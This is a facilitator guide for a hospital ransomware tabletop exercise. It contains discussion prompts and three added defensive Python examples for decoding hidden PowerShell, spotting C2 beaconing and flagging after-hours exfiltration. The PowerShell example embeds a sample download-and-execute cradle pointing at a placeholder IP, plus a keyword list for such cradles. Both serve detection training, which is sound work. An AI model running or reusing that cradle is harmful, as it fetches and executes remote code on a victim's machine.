Large Group Facilitator Guide: LockBit – Hospital Emergency
Quick Reference
- Format: Multi-Team Coordination
- Session length: 120 min + 25 min debrief
- Teams: Alpha (Forensics) / Bravo (Network/Infrastructure) / Charlie (Business Impact)
- Variants: US: Cedar Valley Medical Center / DK: Øresund Universitetshospital
- Expertise level: Beginner to intermediate (recommended as the reference scenario for first large group sessions)
- Central dilemma: Pay the $1.2M ransom to meet the 72-hour deadline, or begin manual recovery knowing the attacker is still in the domain – and PHI has already been exfiltrated
- For format selection, IC briefing, and general facilitation mechanics, see the Large Group Facilitation Guide.
21 Artifacts at a Glance
There is no red herring in this scenario. LockBit is the reference scenario for the Multi-Team Coordination format – it is designed to run cleanly so IMs can focus on facilitation mechanics rather than deception tracking.
| Tier | Team | Card | Key Content |
|---|---|---|---|
| R1 | Alpha | Initial Indicator 1: Phishing Email and Execution Chain | clinician.a phishing click; base64 PowerShell; C2 in 4 seconds; lateral movement to CLIN-WS-201 and ADMIN-WS-009 |
| R1 | Alpha | Initial Indicator 2: Coordinated Ransomware Detonation | 33 hosts in 90 seconds; shadow copy deletion before encryption; EDR console offline at 18:48 UTC; GPO distribution from compromised DC |
| R1 | Bravo | Initial Indicator 1: C2 Outbound Beaconing | 45 outbound connections over 21 days; 1.2MB inbound at 18:16 UTC; domain registered 17 days before phishing |
| R1 | Bravo | Initial Indicator 2: Internal Lateral Movement Traffic | Clinical workstation opened SMB to admin subnet; DC pushed to 27 hosts at 18:38 UTC; medical device subnet same inter-VLAN routing |
| R1 | Charlie | Initial Indicator 1: Clinical Operations Halt Report | 2 surgeries without PACS; pharmacy backlog 14 orders; ambulance diversion decision by 19:15 UTC |
| R1 | Charlie | Initial Indicator 2: Ransom Demand and Data Proof | $1.2M demand; 72-hour deadline; PHI exfiltration confirmed; backup systems described as “gone” |
| R2-3 | Alpha | Deep Analysis 1: Lateral Movement Timeline | it.admin.b credentials stolen from clinician.a workstation; domain admin in 13 minutes; GPO “CVMC_Update_Policy” still active |
| R2-3 | Alpha | Deep Analysis 2: Ransomware Binary Profile | Skips .exe/.dll; RSA-2048; self-deletes after completion; 29 services terminated before encryption; C2 callback on completion |
| R2-3 | Alpha | Deep Analysis 3: Dwell Time Reconstruction | Breach February 14; 3 exfiltration events post-midnight weekdays; payload staged March 5; backup server accessed twice |
| R2-3 | Bravo | Deep Analysis 1: Pre-Encryption Data Exfiltration | DLP alerts suppressed via it.admin.b exception; 3 targeted file shares (PatientRecords, Billing, StaffRecords); all after midnight |
| R2-3 | Bravo | Deep Analysis 2: Backup System Network Position | Backup server in admin subnet for “simplified install”; encrypted 2 minutes before ransomware; tape backup 14 days old and offsite |
| R2-3 | Bravo | Deep Analysis 3: Medical Device Network Exposure | LockBit cannot spread from encrypted hosts; 19 devices on medical subnet with no patch path; unencrypted hosts may have active C2 |
| R2-3 | Charlie | Deep Analysis 1: Business Continuity and Financial Exposure | Ransom $1.2M exceeds insurance sub-limit; recovery estimated $3.2M / 18 days; revenue cycle halted; OCR 60-day clock running |
| R2-3 | Charlie | Deep Analysis 2: Regulatory Notification Requirements | State health dept 72-hour window; insurer notification due tomorrow; breach date February 14 not March 6; 12,000–18,000 patients |
| R2-3 | Charlie | Deep Analysis 3: Ransom Payment Decision Framework | 40% decryptor failure rate; OFAC sanctions review required; domain rebuild required regardless of payment |
| R4-5 | Alpha | Development 1: Evidence Preservation Status | CVMC-DC-01 not rebooted (critical); NetFlow retention window closes Thursday; CLIN-WS-114 memory captured with chain-of-custody |
| R4-5 | Alpha | Development 2: Threat Actor Attribution Context | FBI active investigation of affiliate; prior non-payment recovery: 22 days; prior payment recovery: full recovery achieved |
| R4-5 | Bravo | Development 1: Network Recovery Options | 3 options (A: immediate rebuild; B: payment then rebuild; C: dual-track ED/ICU priority); all require new domain |
| R4-5 | Bravo | Development 2: Ambulance Network Exposure | Gateway intact but ED cannot receive data; diversion active since 19:18 UTC; Riverside General and Valley Medical at near-capacity |
| R4-5 | Charlie | Development 1: Media and Public Exposure Risk | LockBit publishes in 24–48 hours; 3 staff social media posts already; 45 ED patients saw ransom screens |
| R4-5 | Charlie | Development 2: Minimum Viable Restoration Plan | Tape retrieval critical path for Phase 2; paper downtime ceiling ~23:00–01:00 UTC; Phase 2 metric: nurse verifies medication allergy |
Opening Delivery
This is Group A “Crisis Curve” – LockBit has already detonated. The attack is over; the crisis is managing consequences. The drama is paralysis: 33 hosts are encrypted, the attacker is still in the domain, and the ransom clock is running.
LockBit is the reference scenario for this format. Run it first when a group is new to Multi-Team Coordination. The structure is clean, the dilemma is clear, and there are no red herrings to track.
Brief the IC before session open: your job is to synthesize across teams, not to be the loudest voice. You will hear three briefings and need to connect them before making any recommendation to leadership.
“It is 18:52 UTC. Cedar Valley Medical Center’s EDR just showed 33 hosts encrypted in 90 seconds. The ransom note is on every screen. The attacker claims backup systems are gone and PHI has been exfiltrated. You are the incident response team. Turn over your cards.”
Critical note: Teams will ask “should we pay?” in Round 1. That is correct. Do not answer it. The payment decision requires technical, regulatory, and financial inputs from all three teams – none of which are available yet. If an IC tries to make the payment decision in Round 1, ask: “What does Alpha know about whether you can decrypt without the attacker? What does Charlie know about the insurance sub-limit?”
Round-by-Round Facilitation Notes
Round 1 – Initial Indicators
Released: All 6 R1 cards at session open
Alpha discovers: Phishing entry via clinician.a; domain admin compromise before detonation; 33 hosts in 90 seconds via GPO from compromised DC
Bravo discovers: 21 days of beaconing that was invisible; lateral movement from clinical workstation to admin subnet; medical device subnet on same inter-VLAN routing
Charlie discovers: Clinical operations in immediate patient safety territory; $1.2M ransom with 72-hour deadline; PHI exfiltration confirmed; backup systems status unknown
IC synthesis: Bravo knows the attacker is still in the domain. Alpha knows how they got there. Charlie knows the clinical and financial stakes. The IC cannot make any recommendation without inputs from all three.
IM navigation prompt: “Ask Bravo: is the attacker still active in the network right now? Ask Alpha: what does the detonation method tell you about what the attacker can still control? Ask Charlie: what does the board need before they can vote on anything?”
End-of-round check: Has the IC noted that the ransom payment decision cannot be made yet? Has anyone checked whether the backup systems are actually gone?
Timing: 20–25 min
Round 2 – Deep Analysis, First Pass
Released: 3 cards per team at start of Round 2
Alpha discovers: it.admin.b credentials stolen from a clinical workstation (not an IT workstation); domain admin in 13 minutes from phishing click; dwell time began February 14 – not tonight
Bravo discovers: PHI exfiltration through DLP-suppressed exception for it.admin.b; backup server was in the admin subnet (encrypted 2 minutes before ransomware); 14-day-old tape offsite and unaffected
Charlie discovers: $1.2M ransom exceeds insurance sub-limit; recovery cost estimate $3.2M / 18 days; the breach date for notification purposes is February 14, not March 6
IC synthesis: The tape backup exists and is unaffected. That changes the recovery calculation. Charlie has the cost comparison ($1.2M ransom vs. $3.2M recovery) but it misses the 40% decryptor failure rate on Charlie’s Deep Analysis 3 card, which teams usually do not work through until Round 3.
IM navigation prompt: “Ask Bravo: does an offsite tape backup change the recovery options? Ask Alpha: when did the attacker get domain admin – and are they still there now?”
Note: Teams often treat the $1.2M vs. $3.2M comparison as the payment decision answer. It is not – the 40% decryptor failure rate and the domain rebuild requirement (both on Deep Analysis 3 cards, usually reached in Round 3) change the calculus. If Charlie presents payment as clearly correct in Round 2, prompt: “Is that comparison complete? What does Alpha know about whether decryption actually works?”
Timing: 25 min
Round 3 – Deep Analysis, Second Pass
No new artifacts – teams continue with R2-3 material.
Alpha: Full dwell timeline; backup server access pattern; attacker knew the backup schedule. Bravo: Medical device subnet risk assessment; DLP exception analysis. Charlie: OFAC review requirement before any Bitcoin transfer; regulatory notification multi-window analysis.
IC synthesis: The payment decision now has all its components: ransom $1.2M (exceeds insurance sub-limit), 40% decryptor failure rate, domain rebuild required regardless, OFAC review required. Is payment ever the faster path to clinical restoration?
IM navigation prompt: “Charlie has the payment framework. Bravo has the recovery options. Ask the IC: does paying the ransom change the recovery timeline, or does the domain rebuild make it equivalent?”
Timing: 20–25 min
Round 4 – Developments
Released: 2 cards per team at start of Round 4
Alpha: CVMC-DC-01 not rebooted – forensic gold; NetFlow closes Thursday; FBI active investigation with decryptor analysis available
Bravo: 3 recovery options (all require new domain); dual-track Option C gets ED/ICU in 6 hours; tape retrieval status
Charlie: LockBit publishes in 24–48 hours; paper downtime ceiling approaching; Phase 2 metric defined
IC synthesis: What is the recommendation to the board – pay or rebuild? What is the minimum viable restoration timeline that keeps patients safe?
Timing: 20–25 min
Round 5 – Board Briefing (Optional at 180 Min)
Alpha: Evidence preservation closing window; FBI cooperation. Bravo: Chosen recovery option execution; tape ETA. Charlie: Holding statement approval; media response protocol; patient notification scope.
The Central Dilemma
Pay the $1.2M ransom to meet the 72-hour deadline, or begin manual recovery knowing the attacker is still in the domain – and PHI has already been exfiltrated regardless.
LockBit’s dilemma is a board-level decision framed as a technical question. The board cannot vote until they have:
- The decryptor reliability rate (Alpha – 40% failure rate from prior cases)
- The domain rebuild requirement (Bravo – required regardless of payment)
- The insurance sub-limit gap (Charlie – $1.2M exceeds sub-limit)
- The OFAC review timeline (Charlie – required before any Bitcoin transfer)
- The tape backup status (Bravo – offsite, 14 days old, unaffected)
Teams that attempt to answer the payment question before Round 3 are working with incomplete inputs. The IC’s job is to hold the decision until all five inputs are on the table.
The central insight: paying the ransom does not remove the attacker from the domain. A new Active Directory build is required regardless. That single fact changes the cost-benefit analysis entirely. If payment adds only marginal speed to clinical restoration while leaving the same forensic and rebuild work, when would payment ever be the right choice?
Information Asymmetry Map
| Alpha knows | Bravo knows | Charlie knows | IC must synthesize |
|---|---|---|---|
| Domain admin obtained in 13 minutes; attacker used compromised DC for GPO; attacker is still in the domain | Backup server was in admin subnet and is encrypted; 14-day tape is offsite and intact | $1.2M ransom exceeds insurance sub-limit; recovery estimated $3.2M / 18 days | Payment leaves attacker in domain; tape backup changes recovery math; insurance gap means board needs different approval authority |
| Breach date is February 14; 3 structured exfiltration events; attacker accessed backup server twice and knew its schedule | DLP exception for it.admin.b suppressed all exfiltration alerts for 3 weeks | Data breach notification scope: February 14 start date, 12,000–18,000 patients | Exfiltration scope (Alpha) + breach date (Alpha/Charlie) + patient count (Charlie) = notification obligation picture |
| 40% decryptor failure rate from prior cases; domain rebuild required regardless of payment | All 3 recovery options require a new domain; dual-track Option C gets ED/ICU online in 6 hours | OFAC sanctions review required before any Bitcoin transfer | Rebuild required whether or not ransom is paid (Bravo) + 40% failure rate (Alpha) + OFAC timeline (Charlie) = complete payment decision inputs |
Common Failure Modes
1. IC makes payment decision before Round 3 inputs are available
What it looks like: The $1.2M vs. $3.2M comparison lands in Round 2 and the IC recommends payment without the decryptor failure rate or domain rebuild requirement.
IM response: “Is that comparison complete? What does Alpha know about whether decryption actually works on LockBit-encrypted files – and does payment eliminate the attacker from the domain?”
2. Teams assume backup systems are gone
What it looks like: Charlie’s Round 1 card says the attacker claims backup systems are “gone.” Teams treat this as confirmed and don’t check Bravo’s backup status.
IM response: “The ransom note says backups are gone. Has Bravo checked? What specifically is encrypted and what is offsite?”
3. Medical device subnet treated as active threat
What it looks like: Bravo spends Round 2-3 on medical device exposure as if LockBit is still spreading to those devices.
IM response: “LockBit cannot spread from encrypted hosts. What is the actual current risk to the medical device subnet – and which hosts might still have an active C2 connection?”
4. Notification date treated as tonight
What it looks like: Charlie calculates the notification scope using March 6 (ransomware detonation) as the breach date instead of February 14 (initial compromise).
IM response: “When did the attacker first access PHI? Is that the detonation date or earlier – and does that change when the notification clock started?”
5. CVMC-DC-01 rebooted before evidence preserved
What it looks like: Bravo or Alpha initiates recovery actions that include rebooting the domain controller before Alpha’s Development 1 card has been briefed.
IM response: “Before that action: what is CVMC-DC-01’s current state, and what forensic evidence exists only while it remains powered on?”
6. Paper downtime ceiling not connected to recovery timeline
What it looks like: Teams reach Round 4 without anyone connecting the paper downtime ceiling (~23:00–01:00 UTC) to the Phase 2 recovery metric.
IM response: “Paper downtime has a ceiling. Recovery Phase 2 has a start time. Do those two numbers fit – and what happens if they don’t?”
Discussion Prompts by Tier and Team
Initial Indicators – Round 1
ALPHA – Initial Indicator 1: Phishing Email and Execution Chain
- Why does the sender IP, Reply-To domain, and From address all differ? What does that pattern indicate?
- The PowerShell command is encoded in base64 and runs hidden. What is that designed to prevent?
- clinician.a is clinical staff, not IT. What does that tell you about how the attacker chose their target?
- The C2 connection happened within 4 seconds of document open – before any user interaction beyond clicking the file. What does that mean?
- CLIN-WS-201 and ADMIN-WS-009 appear in the lateral activity log. What should you check on those hosts immediately?
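The second prompt above asks what hidden, base64-encoded PowerShell is designed to prevent. The short answer is keyword matching on the process command line: the download cradle is only visible after the argument is base64-decoded as UTF-16LE, which is what powershell.exe expects for -EncodedCommand. The triage routine below is an added example, not code from the guide or from any artifact card; the sample command lines, the C2 URL 198.51.100.23 and the switch names it recognises are constructed for illustration.

```python
import base64
import binascii

# Constructed sample, not the scenario card's actual command line: the first entry mimics the
# hidden, base64-encoded launcher pattern the card describes; the second is a benign script run.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.23/u')"  # hypothetical C2


def encode_ps(script: str) -> str:
    """powershell.exe -EncodedCommand takes base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


SAMPLE_CMDLINES = [
    "powershell.exe -NoP -W Hidden -Exec Bypass -EncodedCommand " + encode_ps(PAYLOAD),
    "powershell.exe -File C:\\Scripts\\inventory.ps1",
]


def _is_switch(tok: str, name: str, extra=()) -> bool:
    """powershell.exe accepts any unambiguous prefix of a switch (e.g. -W for -WindowStyle)."""
    return tok in extra or (len(tok) >= 2 and name.startswith(tok))


def decode_encoded_command(b64: str):
    """Return the UTF-16LE script behind -EncodedCommand, or None if it is not valid base64."""
    try:
        raw = base64.b64decode(b64, validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-16-le", errors="replace")


def analyze_cmdline(cmdline: str) -> dict:
    """Pull evasion switches and the decoded payload out of a process-creation command line."""
    toks = cmdline.split()
    flags, decoded = [], None
    for i, t in enumerate(toks):
        if not t.startswith("-"):
            continue
        tok = t.lstrip("-").lower()
        nxt = toks[i + 1].lower() if i + 1 < len(toks) else ""
        if _is_switch(tok, "encodedcommand", extra=("e", "ec")):
            decoded = decode_encoded_command(toks[i + 1]) if nxt else None
        elif _is_switch(tok, "windowstyle", extra=("w",)) and nxt == "hidden":
            flags.append("hidden-window")
        elif _is_switch(tok, "noprofile"):
            flags.append("no-profile")
        elif _is_switch(tok, "executionpolicy") and nxt in ("bypass", "unrestricted"):
            flags.append("execution-policy-bypass")
        elif _is_switch(tok, "noninteractive"):
            flags.append("non-interactive")
    indicators = []
    if decoded:
        low = decoded.lower()
        if "iex" in low or "invoke-expression" in low:
            indicators.append("invoke-expression")
        if any(k in low for k in ("downloadstring", "downloadfile", "net.webclient", "invoke-webrequest")):
            indicators.append("download-cradle")
        if "http://" in low or "https://" in low:
            indicators.append("url")
        if "frombase64string" in low:
            indicators.append("nested-encoding")
    return {"decoded": decoded, "flags": flags, "indicators": indicators}


if __name__ == "__main__":
    for c in SAMPLE_CMDLINES:
        print(analyze_cmdline(c))
```

Run against the constructed sample, the raw command line contains neither "DownloadString" nor the URL, so a string-match rule on the command line sees nothing; the decoded payload shows both, alongside the hidden-window and execution-policy switches. A detection that decodes -EncodedCommand arguments before matching, or that simply alerts on the switch combination itself, does not depend on the attacker leaving the cradle in cleartext.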
ALPHA – Initial Indicator 2: Coordinated Ransomware Detonation
- Shadow copy deletion happened before encryption on every host. What does that sequence tell you about the attacker’s planning?
- All 33 hosts detonated within 90 seconds. How would a human operator manage that, and is there another explanation?
- The EDR console went offline at 18:48. What does that mean for evidence you need to collect right now?
- The first hosts listed on the card – CLIN-FS-001, ADMIN-FS-003, CLIN-WS-114, CLIN-WS-201, ADMIN-WS-009 – appear to have been the initial set. What do those hosts have in common?
- What central system would have been needed to push this to 33 hosts simultaneously?
BRAVO – Initial Indicator 1: C2 Outbound Beaconing
- 45 outbound connections over 21 days went undetected. What firewall rule or detection logic would have caught this?
- The 1.2MB inbound at 18:16 UTC is very different from the 0.4KB beacons. What changed, and what does that timing mean?
- The domain was registered 17 days before the phishing email. What does that preparation timeline tell you about how this operation was planned?
- Are there other hosts on the network that might have similar outbound beacon patterns to this IP, or other unknown destinations?
- The beaconing ran at exact 6-hour intervals for 20 days. What would make that pattern visible in retrospect?
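The first and last prompts above ask what detection logic would have caught 45 low-volume connections over three weeks and what makes a fixed 6-hour cadence visible in retrospect. The answer is not volume thresholds but regularity: near-zero variance in inter-connection gaps and in request size, with the one large inbound transfer standing out against a background of tiny replies. The following is an added example, not code from the guide or any card; the flow records, internal addresses 10.20.5.41 / 10.20.5.88 and external addresses 203.0.113.77 / 198.51.100.10 are constructed, and the thresholds are illustrative starting points rather than tuned values.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import mean, median, pstdev


def _build_flows():
    """Constructed flow records (ts, src, dst, bytes_out, bytes_in); not the scenario's NetFlow.

    10.20.5.41 beacons to 203.0.113.77 every 6 h for 20 days with ~0.4 KB out and a tiny reply,
    then receives a single 1.2 MB download.  10.20.5.88 talks to 198.51.100.10 ten times at
    irregular daytime intervals with larger, varying sizes (what a legitimate web app looks like).
    """
    flows = []
    t0 = datetime(2026, 2, 14, 9, 12)
    for k in range(80):                                           # 80 beacons x 6 h = 20 days
        ts = t0 + timedelta(hours=6 * k, seconds=(k * 7) % 20)    # a few seconds of jitter
        flows.append((ts, "10.20.5.41", "203.0.113.77", 412, 180))
    flows.append((t0 + timedelta(days=20, hours=1), "10.20.5.41", "203.0.113.77", 900, 1_200_000))
    for k, h in enumerate([0, 3, 27, 31, 52, 58, 75, 99, 120, 130]):
        ts = datetime(2026, 2, 16, 8, 0) + timedelta(hours=h)
        flows.append((ts, "10.20.5.88", "198.51.100.10", 5000 + 900 * k, 40_000 + 3_000 * k))
    return sorted(flows)


FLOWS = _build_flows()


def find_beacons(flows, min_count=10, max_interval_cv=0.10, size_tolerance=0.2, outlier_factor=10):
    """Flag (src, dst) pairs whose connections are periodic and uniformly small.

    Periodicity: coefficient of variation (stdev / mean) of the gaps between connections.
    Size uniformity: share of flows whose bytes_out is within size_tolerance of the pair median.
    Flows whose bytes_in exceeds outlier_factor x the pair's median bytes_in are reported
    separately: the stage-two download against a background of tiny acknowledgements.
    """
    by_pair = defaultdict(list)
    for f in flows:
        by_pair[(f[1], f[2])].append(f)
    hits = []
    for (src, dst), fl in by_pair.items():
        if len(fl) < min_count:
            continue
        fl.sort()
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(fl, fl[1:])]
        cv = pstdev(gaps) / mean(gaps)
        med_out = median(f[3] for f in fl)
        uniform = sum(abs(f[3] - med_out) <= size_tolerance * med_out for f in fl) / len(fl)
        if cv > max_interval_cv or uniform < 0.8:
            continue
        med_in = median(f[4] for f in fl)
        outliers = [f for f in fl if f[4] > outlier_factor * med_in]
        hits.append({"src": src, "dst": dst, "count": len(fl), "period_hours": mean(gaps) / 3600,
                     "interval_cv": cv, "size_uniformity": uniform, "volume_outliers": outliers})
    return hits


if __name__ == "__main__":
    for h in find_beacons(FLOWS):
        print(h["src"], "->", h["dst"], f"every {h['period_hours']:.2f} h,",
              f"cv={h['interval_cv']:.3f}, outliers={len(h['volume_outliers'])}")
```

On the constructed data only the 6-hour pair is returned; the web-app pair has the same connection count but an interval cv above 0.5, so it is the cadence, not the number of connections, that separates them. In retrospect the same query over retained NetFlow answers the fourth prompt as well (other hosts talking to the same destination, or to other destinations with the same cadence), which is why the NetFlow retention window on Alpha’s Development 1 card matters.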
BRAVO – Initial Indicator 2: Internal Lateral Movement Traffic
- A clinical workstation has no legitimate reason to open SMB connections to ADMIN-WS-009 in the admin subnet. Why did that connection succeed?
- The domain controller pushed to 27 hosts at 18:38. What level of domain access would enable that, and when was it likely obtained?
- The medical device subnet (192.168.30.0/24) has the same inter-VLAN routing as the compromised subnets. What does that mean right now?
- How many of the 27 hosts that received the GPO are confirmed encrypted, and how many might still be reachable?
- What single network action, taken immediately, would be most effective at limiting further spread?
CHARLIE – Initial Indicator 1: Clinical Operations Halt Report
- Two surgical procedures are underway without PACS imaging access. What is the immediate patient safety priority?
- Paper downtime is sustainable for 4–6 hours. Technical recovery will take longer than that. What needs to happen to manage that gap?
- The pharmacy backlog is 14 orders and growing. What clinical decisions depend on pharmacy throughput?
- Ambulance diversion has not been activated. What information would your team need before recommending it to the CMO by 19:15 UTC?
- Which clinical system, if partially restored first, would have the highest immediate patient safety impact?
CHARLIE – Initial Indicator 2: Ransom Demand and Data Proof
- The message says backup systems are “gone.” What do you need to check, and how quickly?
- PHI exfiltration is confirmed by the proof files. What legal obligations does that trigger, and when do they start?
- The ransom deadline is 72 hours from now. How does that timeline interact with your investigation and recovery timelines?
- The instruction to not contact law enforcement – what is your team’s position on that?
- What is the minimum factual picture leadership needs before they can make any decision about the ransom demand?
Deep Analysis – Rounds 2-3
ALPHA – Deep Analysis 1: Lateral Movement Timeline
- it.admin.b’s credentials were stolen from clinician.a’s workstation. Why would an IT admin’s credentials be accessible in a clinician’s machine memory?
- The attacker had domain admin access 13 minutes after the phishing click. At that point, what on the network was NOT at risk?
- The GPO “CVMC_Update_Policy” was created at 18:31. Is it still active and pushing to any systems?
- CVMC-DC-01 was accessed with stolen credentials. What is its current state, and what does that mean for recovery?
- The attack moved from phishing to domain admin in 13 minutes. Which step in this chain could have been interrupted, and how?
ALPHA – Deep Analysis 2: Ransomware Binary Profile
- The binary skips .exe and .dll files. What does that tell you about the attacker’s intention – destruction vs. extortion?
- Files are encrypted with RSA-2048. What does that mean practically for any attempt to decrypt without paying?
- The binary self-deletes after completing. What does that mean for forensic evidence on the affected hosts?
- 29 services including backup and database services were terminated before encryption. Which of those services matter most for your recovery path?
- The C2 callback on completion tells the attacker how many files were encrypted. What might the attacker do with that confirmation?
ALPHA – Deep Analysis 3: Dwell Time Reconstruction
- The breach started February 14 – not tonight. What does that mean for the scope of what was accessed?
- Three separate exfiltration events happened after midnight on weekdays. What detection capability would catch that pattern?
- The attacker accessed the backup server twice and noted its schedule. Why would that matter to them?
- The payload was staged March 5 but not detonated until March 6. What might the attacker have been waiting for?
- How far back do you need to look in logs to understand the full scope of this incident?
BRAVO – Deep Analysis 1: Pre-Encryption Data Exfiltration
- The DLP alerts were suppressed because it.admin.b has an exception. What was the reasoning behind that exception, and is it still justified?
- Three sessions targeted three different file shares – PatientRecords, Billing, StaffRecords. What does the structured targeting suggest?
- All three events happened after midnight on weekdays. What monitoring would have detected that pattern regardless of the account exception?
- The exfiltration happened through CLIN-WS-114 using it.admin.b credentials. At the time, where was it.admin.b actually logged in?
- The DLP exception for it.admin.b prevented detection for three weeks. What changes to that policy would you recommend?
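Alpha’s Deep Analysis 3 prompts and Bravo’s Deep Analysis 1 prompts both ask the same detection question from different sides: what would have caught three after-midnight bulk reads of PatientRecords, Billing and StaffRecords when the DLP rule had an exception for it.admin.b? The rules that survive an allow-list are the ones that do not key on the account: a privileged account authenticating from a clinical-role host, and bulk reads from sensitive shares on a weekday night. The code below is an added example, not the hospital’s DLP policy or anything from the cards. The audit records, the host-to-role inventory (with ADMIN-WS-002 as a hypothetical IT workstation), the clinician.c account and the 500 MB bulk threshold are constructed; the account, host and share names otherwise reuse the scenario’s labels, and timestamps are treated as hospital local time.

```python
from datetime import datetime, time

# Constructed file-server audit records: (timestamp, account, source host, share, bytes read).
# The three it.admin.b reads from CLIN-WS-114 mirror the pattern on the cards; the other two rows
# are ordinary activity added so the rules have something legitimate to leave alone.
RECORDS = [
    (datetime(2026, 2, 19, 1, 12), "it.admin.b", "CLIN-WS-114", "PatientRecords", 3_100_000_000),
    (datetime(2026, 2, 19, 14, 5), "it.admin.b", "ADMIN-WS-002", "Backups", 200_000_000),
    (datetime(2026, 2, 21, 1, 5), "clinician.c", "CLIN-WS-050", "PatientRecords", 20_000_000),
    (datetime(2026, 2, 26, 0, 48), "it.admin.b", "CLIN-WS-114", "Billing", 1_400_000_000),
    (datetime(2026, 3, 4, 1, 30), "it.admin.b", "CLIN-WS-114", "StaffRecords", 700_000_000),
]

# Constructed inventory: which hosts an IT administrator should ever be interactively using.
HOST_ROLE = {"CLIN-WS-114": "clinical", "CLIN-WS-050": "clinical", "ADMIN-WS-002": "it"}
PRIVILEGED = {"it.admin.b"}
SENSITIVE_SHARES = {"PatientRecords", "Billing", "StaffRecords"}
BULK_BYTES = 500_000_000            # illustrative threshold, not a tuned value
NIGHT = (time(0, 0), time(5, 0))    # "after midnight" window, local time


def dlp_volume_alerts(records, exceptions=frozenset()):
    """The rule that existed: bulk reads from sensitive shares, silenced for excepted accounts."""
    return [r for r in records
            if r[3] in SENSITIVE_SHARES and r[4] >= BULK_BYTES and r[1] not in exceptions]


def behavioral_alerts(records):
    """Rules with no allow-list: who was used, from what kind of host, and when."""
    alerts = []
    for ts, account, host, share, nbytes in records:
        reasons = []
        # Admin credentials should never be presented from a clinical workstation.
        if account in PRIVILEGED and HOST_ROLE.get(host, "unknown") != "it":
            reasons.append("privileged-account-from-non-it-host")
        # Bulk reads of PHI/finance/HR shares on a weekday night are anomalous for anyone.
        weekday_night = ts.weekday() < 5 and NIGHT[0] <= ts.time() < NIGHT[1]
        if share in SENSITIVE_SHARES and weekday_night and nbytes >= BULK_BYTES:
            reasons.append("after-hours-bulk-read")
        if reasons:
            alerts.append({"ts": ts, "account": account, "host": host,
                           "share": share, "bytes": nbytes, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    print("DLP rule with exception:", dlp_volume_alerts(RECORDS, exceptions={"it.admin.b"}))
    for a in behavioral_alerts(RECORDS):
        print(a["ts"], a["account"], a["host"], a["share"], a["reasons"])
```

With the exception in place the volume rule returns nothing for any of the three sessions, which is the three-week blind spot on the card. The behavioral rules fire on all three, twice each, without knowing anything about the exception list: the host-role check alone would have caught the first session on February 19, which is the answer to “at the time, where was it.admin.b actually logged in?”.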
BRAVO – Deep Analysis 2: Backup System Network Position
- The backup server was placed in the admin subnet to “simplify backup agent installation.” What is the security consequence of that decision?
- The attacker encrypted the backup two minutes before detonating the ransomware. What does that sequencing tell you about their planning?
- The last tape backup is 14 days old. What does a 14-day data gap mean specifically for Cedar Valley’s clinical records?
- The backup server used domain admin credentials for authentication. What alternative authentication design would have isolated it?
- The tape is offsite and currently unaffected. What is the fastest path to beginning a restoration from it?
BRAVO – Deep Analysis 3: Medical Device Network Exposure
- LockBit cannot spread from encrypted hosts. What is the actual current risk to the medical device subnet?
- Which unencrypted hosts might still have an active C2 connection, and how would you check?
- The 19 devices on the medical device subnet have no patch path. What network-level controls substitute for host-level patching?
- Which medical devices, if disrupted, would have direct patient safety consequences right now?
- What is the fastest action that would reduce risk to the medical device subnet without disrupting patient care?
CHARLIE – Deep Analysis 1: Business Continuity and Financial Exposure
- The ransom demand exceeds the insurance sub-limit. Who needs to be in the room to authorize any payment decision?
- The recovery cost estimate ($3.2M, 18 days) exceeds the ransom ($1.2M). Does that financial comparison resolve the payment question, or are there other factors?
- Revenue cycle is completely halted. How long can the hospital sustain zero billing income before operational decisions change?
- What information does the board need before they can vote on any payment option?
- The 60-day OCR notification clock is running. What internal process needs to start tonight to meet that deadline?
CHARLIE – Deep Analysis 2: Regulatory Notification Requirements
- The state health department 72-hour window closes Thursday evening. What does a preliminary notification look like, and who authorizes it?
- The insurer notification is “due by tomorrow.” What does a missed insurer notification mean for the $2M coverage?
- The attacker explicitly threatens consequences if law enforcement is contacted. What is the practical consequence of reporting to the FBI vs. not reporting?
- The patient count estimate is 12,000–18,000. That triggers media notification as well as patient notification. Who manages external communications?
- The breach date is February 14, not March 6. How does that change the notification scope?
CHARLIE – Deep Analysis 3: Ransom Payment Decision Framework
- What specific technical facts does your team need to provide to the board before they vote?
- A 40% decryptor failure rate means some systems may need to be restored from backup even if payment is made. How does that change the cost-benefit analysis?
- OFAC sanctions risk means legal review is required before any Bitcoin transfer. How long does that take, and does that timeline fit within the 72-hour window?
- If the board decides not to pay, what does the recovery timeline look like, and what patient care decisions depend on it?
- Payment does not remove the attacker from the network – the domain is still compromised regardless. What does that mean for the sequencing of any response?
Developments – Rounds 4-5
ALPHA – Development 1: Evidence Preservation Status
- CVMC-DC-01 has not been rebooted. What specifically do you need to extract from it before any recovery action touches that machine?
- The NetFlow retention window closes Thursday. Who on your team is responsible for exporting those logs?
- CLIN-WS-114 memory has been captured and has chain-of-custody. Who needs to be notified that this evidence exists?
- The Windows event logs on 14 clinical workstations are encrypted and inaccessible. What does that mean for reconstructing the attacker’s activity on those machines?
- What is the priority order for forensic tasks in the next four hours, and who owns each one?
ALPHA – Development 2: Threat Actor Attribution Context
- The FBI has an active investigation of this affiliate. What does Cedar Valley’s cooperation mean for that investigation?
- Prior non-payment recovery took 22 days. How does that timeline compare to Cedar Valley’s current recovery options?
- The February 2026 case paid and achieved full recovery. How does that information factor into the board’s decision?
- The FBI can provide decryptor analysis and recovery assistance. What specifically should Cedar Valley request?
- Is there information in this threat intelligence that should change any decisions already made or planned tonight?
BRAVO – Development 1: Network Recovery Options
- All options require a new domain. What does that mean for the timeline and who can execute a new AD build at this hour?
- Option C gets ED and ICU online in 6 hours but requires dual-track execution. Does your team have the capacity?
- The tape is 40 miles away. Who is authorizing retrieval, and is it already in transit?
- Under Option B (payment), the domain still needs to be rebuilt. What does “payment buys us time” actually mean in that context?
- Which option does your team recommend, and what does the recommendation depend on?
BRAVO – Development 2: Ambulance Network Exposure
- The gateway is intact, but the ED can’t receive data. Is a single-workstation restore for ambulance data reception worth prioritizing alongside the full recovery?
- Verbal pre-arrival handoffs have been running for 3 hours with no adverse events. How long is that sustainable, and what changes that assessment?
- Diversion has been active since 19:18. When will it be safe to lift, and what system restoration does that decision depend on?
